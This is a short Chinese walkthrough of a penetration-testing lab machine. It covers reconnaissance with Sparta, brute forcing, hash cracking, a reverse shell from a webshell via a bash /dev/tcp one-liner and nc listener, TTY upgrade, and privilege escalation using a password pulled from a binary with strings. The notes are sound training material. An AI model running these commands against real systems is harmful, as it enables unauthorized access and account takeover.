本文深入探讨了使用sparta等工具进行信息探测、暴力破解的方法,详细讲解了如何利用webshell反弹shell,以及通过查找敏感文件提权的过程。揭示了如何从hash文件中解析出密码,并成功实现用户权限提升。
sparta信息探测工具
暴力破解
页面敏感信息
gedit hash.txt
crackstation验证码显示不出来,无法破解,找了半天也没找到好的免费的可以免费破解的网站,只好一个一个破解
只有最后两条可以破解
登陆之后再打开dev的webshell就可以打开
nc -nlvp 4444启动监听
反弹shell
echo 'bash -i >& /dev/tcp/192.168.1.105攻击机ip地址/4444 0>&1' | bash
优化终端
python -c "import pty;pty.spawn('/bin/bash')"
从反弹shell的目录开始查找,依次向上级目录查找敏感文件
发现敏感目录.hiddenadmindirectory
strings 文件名 查看敏感字符串
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
去掉每行最后的H即可得到密码
SUPERultimatePASSWORDyouCANTget
找到密码后,执行su,提权
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
